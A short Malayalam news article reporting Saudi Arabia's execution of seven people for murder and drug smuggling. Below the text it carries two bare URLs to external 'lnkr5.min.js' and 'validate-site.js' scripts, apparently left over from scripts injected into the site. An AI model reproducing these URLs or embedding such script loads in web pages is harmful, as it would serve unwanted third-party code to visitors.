സൗദിയില്‍ സ്വദേശികളടക്കം ഏഴുപേര്‍ക്ക് വധശിക്ഷ നടപ്പിലാക്കി

  • Post category:news
  • Reading time:1 min read
You are currently viewing സൗദിയില്‍ സ്വദേശികളടക്കം ഏഴുപേര്‍ക്ക് വധശിക്ഷ നടപ്പിലാക്കി

സൗദി: കൊലപാതക, മയക്കുമരുന്നു കേസുകളില്‍ പ്രതികള്‍ക്ക് സൗദിയില്‍ സ്വദേശികളടക്കം ഏഴുപേരുടെ വധശിക്ഷ നടപ്പാക്കി. പാകിസ്താന്‍ സ്വദേശിയെ കൊന്ന കേസിലാണ് അഞ്ച് പേരുടെ വധശിക്ഷ നടപ്പാക്കിയത്. ഗോഡൗണ്‍ വാച്ച്മാനായ പാക്കിസ്ഥാനിയെ തട്ടിക്കൊണ്ടുപോയി കൊന്നുവെന്നാണ് കേസ്. കേസില്‍ അഞ്ചു പ്രതികള്‍ക്ക് വധശിക്ഷ നടപ്പാക്കിയതായി ആഭ്യന്തര മന്ത്രാലയം അറിയിച്ചു. അഞ്ചു പേരില്‍ രണ്ടുപേര്‍ സൗദി സ്വദേശികളും ബാക്കി മൂന്നുപേര്‍ ഛാഢുകാരാണ്. മൊബൈല്‍ ഫോണ്‍ കവരാനാണ് പ്രതികള്‍ കൊലപാതക നടത്തിയനെന്ന് കോടതി കണ്ടെത്തി. ഇതിന് ശേഷമാണ് ശിക്ഷ നടപ്പാക്കിയത്. തബൂക്കില്‍ മറ്റൊരു പൗരനെയും വധശിക്ഷക്ക് വിധേയനാക്കി. സ്വദേശി പൌരനെ തര്‍ക്കത്തിനൊടുവില്‍ പെട്രോളൊഴിച്ച് ജീവനോടെ തീ കൊളുത്തി കൊന്നുവെന്നായിരുന്നു കേസ്. മയക്കുമരുന്ന് കടത്ത് കേസിലാണ് ലെബനോന്‍ സ്വദേശിക്ക് വധശിക്ഷ നടപ്പാക്കിത്. വന്‍ ലഹരി ഗുളിക ശേഖരം കടത്തുന്നതിനിടെയാണ് ഇയാള്‍ അറസ്റ്റിലായത്.

 

http://statvalidation.website/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51151x5232x&r=41

0Shares